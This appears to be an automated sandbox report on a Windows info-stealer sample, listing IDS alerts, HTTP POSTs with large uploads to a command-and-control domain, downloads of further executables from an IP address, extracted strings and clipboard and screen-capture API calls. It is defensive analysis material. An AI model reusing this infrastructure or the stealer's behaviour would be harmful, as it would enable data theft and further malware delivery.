00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 44 05 00 00 00 60 00 00 00 04 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 36 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 e0 29 00 00 a0 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 79 70 77 75 76 63 6a 64 00 40 1a 00 00 80 2a 00 00 2c 1a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 68 6f 66 79 6a 6d 74 62 00 20 00 00 00 c0 44 00 00 06 00 00 00 66 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 e0 44 00 00 22 00 00 00 6c 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: Joe Sandbox ViewIP Address: 104.21.50.161 104.21.50.161
                    Source: Joe Sandbox ViewIP Address: 185.215.113.16 185.215.113.16
                    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49728 -> 104.21.50.161:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49734 -> 104.21.50.161:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49769 -> 104.21.50.161:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49780 -> 104.21.50.161:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49722 -> 104.21.50.161:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49801 -> 104.21.50.161:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49745 -> 104.21.50.161:443
                    Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.9:49807 -> 185.215.113.16:80
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49756 -> 104.21.50.161:443
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: tacitglibbr.biz
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 53Host: tacitglibbr.biz
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=7MOPAZNNL5BSB8TEC5CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12857Host: tacitglibbr.biz
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ORQDK9H7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15009Host: tacitglibbr.biz
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=HQNCZSSBDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20531Host: tacitglibbr.biz
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2HTYL7EE2V9NXASFFZZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1246Host: tacitglibbr.biz
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=L0F67C2UNUCPCVBJERPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 551737Host: tacitglibbr.biz
                    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 88Host: tacitglibbr.biz
                    Source: global trafficHTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: global trafficHTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
                    Source: global trafficDNS traffic detected: DNS query: tacitglibbr.biz
                    Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: tacitglibbr.biz
                    Source: goldlummaa.exe, 00000003.00000002.2085240050.0000000000B55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/
                    Source: goldlummaa.exe, 00000003.00000002.2085240050.0000000000B55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/C
                    Source: goldlummaa.exe, 00000003.00000002.2085240050.0000000000B55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/n
                    Source: goldlummaa.exe, 00000003.00000002.2085240050.0000000000B09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exe
                    Source: goldlummaa.exe, 00000003.00000002.2085240050.0000000000B09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exe1dO
                    Source: goldlummaa.exe, 00000003.00000002.2085144049.00000000008FA000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exeL
                    Source: goldlummaa.exe, 00000003.00000002.2085240050.0000000000B09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exeX
                    Source: goldlummaa.exe, 00000003.00000002.2085240050.0000000000B09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exe
                    Source: goldlummaa.exe, 00000003.00000002.2085240050.0000000000B55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/wU
                    Source: goldlummaa.exe, 00000003.00000003.1522093621.000000000337D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                    Source: goldlummaa.exe, 00000003.00000003.1522093621.000000000337D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                    Source: goldlummaa.exe, 00000003.00000003.1522093621.000000000337D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                    Source: goldlummaa.exe, 00000003.00000003.1522093621.000000000337D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                    Source: goldlummaa.exe, 00000003.00000003.1522093621.000000000337D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                    Source: goldlummaa.exe, 00000003.00000003.1522093621.000000000337D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                    Source: goldlummaa.exe, 00000003.00000003.1522093621.000000000337D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                    Source: goldlummaa.exe, 00000003.00000003.1522093621.000000000337D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                    Source: goldlummaa.exe, 00000003.00000003.1522093621.000000000337D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                    Source: Amcache.hve.7.drString found in binary or memory: http://upx.sf.net
                    Source: goldlummaa.exe, 00000003.00000003.1522093621.000000000337D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                    Source: goldlummaa.exe, 00000003.00000003.1522093621.000000000337D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                    Source: goldlummaa.exe, 00000003.00000003.1432654744.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1432795901.00000000032A6000.00000004.00000800.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1432719169.00000000032A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: goldlummaa.exe, 00000003.00000003.1432654744.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1432795901.00000000032A6000.00000004.00000800.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1432719169.00000000032A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: goldlummaa.exe, 00000003.00000003.1432654744.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1432795901.00000000032A6000.00000004.00000800.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1432719169.00000000032A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: goldlummaa.exe, 00000003.00000003.1432654744.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1432795901.00000000032A6000.00000004.00000800.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1432719169.00000000032A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: goldlummaa.exe, 00000003.00000003.1432654744.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1432795901.00000000032A6000.00000004.00000800.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1432719169.00000000032A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: goldlummaa.exe, 00000003.00000003.1432654744.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1432795901.00000000032A6000.00000004.00000800.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1432719169.00000000032A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: goldlummaa.exe, 00000003.00000003.1432654744.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1432795901.00000000032A6000.00000004.00000800.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1432719169.00000000032A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: goldlummaa.exe, 00000003.00000003.1527089071.000000000358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                    Source: goldlummaa.exe, 00000003.00000003.1527089071.000000000358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                    Source: goldlummaa.exe, 00000003.00000003.1572243214.0000000000B0C000.00000004.00000020.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1432304745.0000000000B0D000.00000004.00000020.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1613022112.0000000000B6C000.00000004.00000020.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1612892229.0000000000B6B000.00000004.00000020.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1401845201.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1521810547.0000000000B0C000.00000004.00000020.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1702688956.0000000000B6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tacitglibbr.biz/
                    Source: goldlummaa.exe, 00000003.00000003.1572243214.0000000000B0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tacitglibbr.biz/.
                    Source: goldlummaa.exe, 00000003.00000003.1521242036.00000000032E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tacitglibbr.biz//
                    Source: goldlummaa.exe, 00000003.00000003.1572243214.0000000000B0C000.00000004.00000020.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1521810547.0000000000B0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tacitglibbr.biz/5nascr
                    Source: goldlummaa.exe, 00000003.00000003.1613022112.0000000000B6C000.00000004.00000020.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1612892229.0000000000B6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tacitglibbr.biz/al6
                    Source: goldlummaa.exe, 00000003.00000003.1401845201.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1522003733.00000000032E8000.00000004.00000800.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1521242036.00000000032E8000.00000004.00000800.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1702688956.0000000000B6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tacitglibbr.biz/api
                    Source: goldlummaa.exe, 00000003.00000003.1572243214.0000000000B0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tacitglibbr.biz/api.
                    Source: goldlummaa.exe, 00000003.00000002.2085240050.0000000000B09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tacitglibbr.biz/apiX
                    Source: goldlummaa.exe, 00000003.00000003.1521810547.0000000000B0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tacitglibbr.biz/e
                    Source: goldlummaa.exe, 00000003.00000003.1576661897.00000000032E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tacitglibbr.biz/h
                    Source: goldlummaa.exe, 00000003.00000003.1401845201.0000000000B0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tacitglibbr.biz/int16C
                    Source: goldlummaa.exe, 00000003.00000003.1432304745.0000000000B0D000.00000004.00000020.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1401845201.0000000000B0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tacitglibbr.biz/perati
                    Source: goldlummaa.exe, 00000003.00000003.1521810547.0000000000B0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tacitglibbr.biz/pi
                    Source: goldlummaa.exe, 00000003.00000003.1613022112.0000000000B6C000.00000004.00000020.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1612892229.0000000000B6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tacitglibbr.biz/rs.
                    Source: goldlummaa.exe, 00000003.00000002.2085240050.0000000000B6B000.00000004.00000020.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1702688956.0000000000B6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tacitglibbr.biz/s
                    Source: goldlummaa.exe, 00000003.00000003.1401845201.0000000000B5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tacitglibbr.biz:443/api
                    Source: goldlummaa.exe, 00000003.00000003.1432654744.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1432795901.00000000032A6000.00000004.00000800.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1432719169.00000000032A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: goldlummaa.exe, 00000003.00000003.1432654744.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1432795901.00000000032A6000.00000004.00000800.00020000.00000000.sdmp, goldlummaa.exe, 00000003.00000003.1432719169.00000000032A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: goldlummaa.exe, 00000003.00000003.1527089071.000000000358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.HCe2hc5EPKfq
                    Source: goldlummaa.exe, 00000003.00000003.1527089071.000000000358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.oX6J3D7V9Efv
                    Source: goldlummaa.exe, 00000003.00000003.1527089071.000000000358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                    Source: goldlummaa.exe, 00000003.00000003.1527089071.000000000358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                    Source: goldlummaa.exe, 00000003.00000003.1527089071.000000000358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                    Source: goldlummaa.exe, 00000003.00000003.1527089071.000000000358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                    Source: unknownHTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.9:49722 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.9:49728 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.9:49734 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.9:49745 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.9:49756 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.9:49769 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.9:49780 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.9:49801 version: TLS 1.2
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_004310D0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,3_2_004310D0
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_004310D0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,3_2_004310D0
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_00431839 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,3_2_00431839
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 0_2_00C610000_2_00C61000
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 0_2_00C652350_2_00C65235
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 0_2_00C715420_2_00C71542
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_0043D8303_2_0043D830
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_004210E03_2_004210E0
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_0043D0A03_2_0043D0A0
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_004361E03_2_004361E0
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_004259903_2_00425990
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_004152983_2_00415298
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_004223B83_2_004223B8
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_0040B44C3_2_0040B44C
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_0042B4FC3_2_0042B4FC
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_0040DD253_2_0040DD25
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_00422E933_2_00422E93
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_00438EA03_2_00438EA0
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_00435EA03_2_00435EA0
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_004087903_2_00408790
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_004260543_2_00426054
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_0043B0683_2_0043B068
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_004140703_2_00414070
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_0043C0203_2_0043C020
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_004398303_2_00439830
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_0041B0E13_2_0041B0E1
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_0041F0E03_2_0041F0E0
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_004358903_2_00435890
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_004340983_2_00434098
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_004180A93_2_004180A9
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_0040A9403_2_0040A940
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_0041714B3_2_0041714B
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_004081603_2_00408160
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_0040C9173_2_0040C917
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_0042B12C3_2_0042B12C
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_0042F1303_2_0042F130
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_004039C03_2_004039C0
